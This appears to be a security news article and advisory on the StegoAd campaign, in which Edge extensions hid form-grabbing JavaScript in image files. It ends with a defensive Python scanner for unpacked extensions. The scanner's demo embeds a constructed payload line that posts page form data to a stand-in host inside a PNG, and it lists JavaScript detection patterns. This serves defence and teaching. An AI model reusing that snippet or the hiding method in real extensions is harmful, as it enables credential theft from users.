
MICROSOFT has removed 119 malicious browser extensions from its Edge add‑on store after discovering they were part of a long‑running adware campaign dubbed StegoAd. The extensions first appeared in the store in mid‑2024 and remained available until the takedown in June 2026. They masqueraded as useful tools such as ad blockers, virtual private networks and productivity helpers, and together they attracted more than 2.6 million installs. The scale of the distribution shows how attackers can abuse a trusted marketplace to reach a broad user base, and security teams warn that malware in official channels undermines confidence in browser add‑on ecosystems.
Analysis of the offending extensions showed that the malicious payload was hidden inside ordinary image and font files using steganographic methods, which let the code slip past scanners that inspect only script files. Hidden code cannot run on its own, however: a small loader in the extension's visible JavaScript has to read the carrier file, extract the payload and evaluate it, and that loader is the part a careful static review can still catch. The embedded JavaScript remained inert in most installations and executed only when a specific trigger was met, such as a visit to a predefined domain. This selective activation reduced the likelihood of detection during routine security reviews and sandbox runs. Researchers noted that the obfuscation technique varied slightly between versions of the extensions, complicating signature‑based detection. No CVE identifiers have been published because the abuse relied on legitimate extension capabilities rather than a software flaw.
When the payload activated, it began harvesting usernames and passwords from login forms and intercepted one‑time codes used for two‑factor authentication while simultaneously injecting fraudulent advertisements into legitimate web pages. The injected ads mimicked genuine banners from major platforms such as Google Shopping and Amazon Marketplace, generating revenue for the operators through pay‑per‑click schemes. At the same time, stolen credentials were used to access accounts, change settings and propagate further malicious extensions. The dual approach of ad fraud and account takeover allowed the campaign to persist for roughly two years before being noticed. Victims often remained unaware of the compromise until they noticed unexpected charges or login alerts.
Microsoft’s removal of the extensions halted further distribution from the store, though copies already installed remain a concern until they are disabled or removed on each device. Investigators have not identified a specific threat actor behind the StegoAd infrastructure. The operation displayed a clear ability to evolve its tactics, altering the steganographic concealment and the trigger conditions across multiple releases, an adaptability that mirrors other long‑lived adware and malware distribution efforts targeting browser extensions.
Security observers note that, attribution or not, the case shows that trust in official repositories can be exploited and that add‑ons need continuous vetting even after they have been approved for distribution.
Users should begin by opening the Edge extensions page (edge://extensions) and reviewing each entry for unfamiliar names, unexpected permissions or permissions that do not match the advertised purpose, such as an ad blocker that asks to read data on all sites and access cookies. Any add‑on that cannot be traced to a known developer, or that was installed without a deliberate click, should be disabled and removed immediately. On managed devices, a policy that blocks installation of anything outside an approved list prevents similar installations in the future.
Monitoring network traffic for repeated connections to unfamiliar advertising domains, or to IP addresses with poor reputation, can help spot the covert callbacks used by the malware. Where browser management or endpoint tooling can log extension installs, updates and network activity, enabling that logging and reviewing it regularly provides an additional layer of visibility.
Organisations are encouraged to enforce application control policies that limit installations to an approved list of extension IDs (in Edge, the ExtensionInstallBlocklist and ExtensionInstallAllowlist policies serve this purpose) and to review that list quarterly. Endpoint protection platforms should be updated with detection rules that look for obfuscated JavaScript embedded in media files, a technique commonly used in steganographic campaigns, and for extension scripts that decode and evaluate data pulled from image or font assets.
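The extension review described above (unknown IDs, mismatched permissions) and the media-file check can be scripted. The following is an added example written for this article, not tooling from Microsoft or from the researchers who analysed StegoAd. It walks one unpacked extension directory, compares the ID with an allowlist, flags permissions an ad blocker has no reason to request, and checks PNG files for data appended after the IEND chunk that looks like JavaScript. That appended-data trick is the simplest form of hiding code in an image; the article does not say which encoding StegoAd used, and a pixel-level scheme would need a different check. The sample extension, its ID and the allowlist are constructed for the demo; on a real machine you would point it at a profile's Extensions/<id>/<version>/ directory instead.

```python
import json
import os
import re
import struct
import tempfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Permissions a claimed ad blocker rarely needs but a form grabber does.
# Judgement call for this demo, not a vendor list.
RISKY_PERMISSIONS = {"webRequest", "webRequestBlocking", "cookies", "tabs",
                     "scripting", "<all_urls>"}

JS_TOKENS = re.compile(rb"(function\s*\(|=>|eval\(|new Function\(|document\.|"
                       rb"chrome\.|fetch\(|XMLHttpRequest|atob\()")


def png_trailing_data(data: bytes) -> bytes:
    """Return the bytes that follow the IEND chunk (b'' for a clean PNG)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4  # header + payload + CRC
        if ctype == b"IEND":
            return data[chunk_end:]
        pos = chunk_end
    raise ValueError("truncated PNG: no IEND chunk")


def looks_like_javascript(blob: bytes) -> bool:
    """Crude heuristic: mostly printable bytes containing several JS tokens."""
    if len(blob) < 16:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in blob) / len(blob)
    return printable > 0.9 and len(JS_TOKENS.findall(blob)) >= 2


def scan_extension(ext_dir: str, ext_id: str, allowlist: set) -> list:
    """Return human-readable findings for one unpacked extension directory."""
    findings = []
    if ext_id not in allowlist:
        findings.append(f"{ext_id}: not on the approved list")
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    declared = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for perm in sorted(declared & RISKY_PERMISSIONS):
        findings.append(f"{ext_id}: risky permission {perm} for {manifest.get('name')!r}")
    for root, _dirs, files in os.walk(ext_dir):
        for name in files:
            if not name.lower().endswith(".png"):
                continue
            with open(os.path.join(root, name), "rb") as fh:
                data = fh.read()
            try:
                tail = png_trailing_data(data)
            except ValueError as exc:
                findings.append(f"{ext_id}: {name} malformed ({exc})")
                continue
            if tail and looks_like_javascript(tail):
                findings.append(f"{ext_id}: {name} carries {len(tail)} bytes of JS-like data after IEND")
    return findings


def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_extension(base_dir: str, hide_payload: bool) -> str:
    """Write a constructed 'ad blocker' extension; optionally append a JS stub to its icon."""
    ext_dir = os.path.join(base_dir, "ext")
    os.makedirs(os.path.join(ext_dir, "icons"), exist_ok=True)
    manifest = {"manifest_version": 3, "name": "Fast Ad Blocker Pro", "version": "1.0",
                "permissions": ["storage", "webRequest", "cookies"],
                "host_permissions": ["<all_urls>"]}
    with open(os.path.join(ext_dir, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1 greyscale, 8-bit
    png = (PNG_SIG + _png_chunk(b"IHDR", ihdr)
           + _png_chunk(b"IDAT", zlib.compress(b"\x00\x00"))  # filter byte + one pixel
           + _png_chunk(b"IEND", b""))
    if hide_payload:
        # Constructed stand-in for a hidden stage with a domain trigger; never executed here.
        png += (b"(function(){if(location.host==='example.test'){var f=document.forms;"
                b"fetch('https://ads.example/c',{method:'POST',body:JSON.stringify(f)})}})();")
    with open(os.path.join(ext_dir, "icons", "icon.png"), "wb") as fh:
        fh.write(png)
    return ext_dir


def triage_demo(hide_payload: bool = True) -> list:
    """Build the constructed sample in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        ext_dir = build_sample_extension(tmp, hide_payload)
        # 32 letters a-p, the shape of a real Chromium extension ID; value is made up.
        return scan_extension(ext_dir, "abcdefghijklmnopabcdefghijklmnop", {"known-corp-ext-id"})


if __name__ == "__main__":
    for line in triage_demo():
        print(line)
```

Run as a script it prints five findings for the constructed sample: the unknown ID, three risky permissions and the icon with appended script. The permission check is the cheap, reliable part; the PNG check only catches appended data, so treat a hit as a reason to pull the extension's own scripts and look for the loader that reads the image, rather than as proof on its own.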
Developers who distribute extensions ought to sign their packages with a trusted certificate and publish a clear changelog so users can verify authenticity. Training staff to recognise excessive permission requests and to report suspicious add‑ons reduces the chance of successful social engineering. Regular audits of browser configurations across managed devices help ensure that unauthorised extensions do not remain hidden.
Staying informed about emerging threats through reputable security advisories and sharing indicators of compromise within trusted information‑sharing groups remains essential. Because the StegoAd campaign relied on stealth rather than a traditional vulnerability, defensive strategies must focus on behaviour‑based detection and user awareness. Maintaining current versions of the browser and of all installed extensions limits the window of opportunity for attackers to exploit outdated components.
By combining technical controls with vigilant practices, both individuals and organisations can reduce the likelihood of falling victim to similar stealthy adware operations.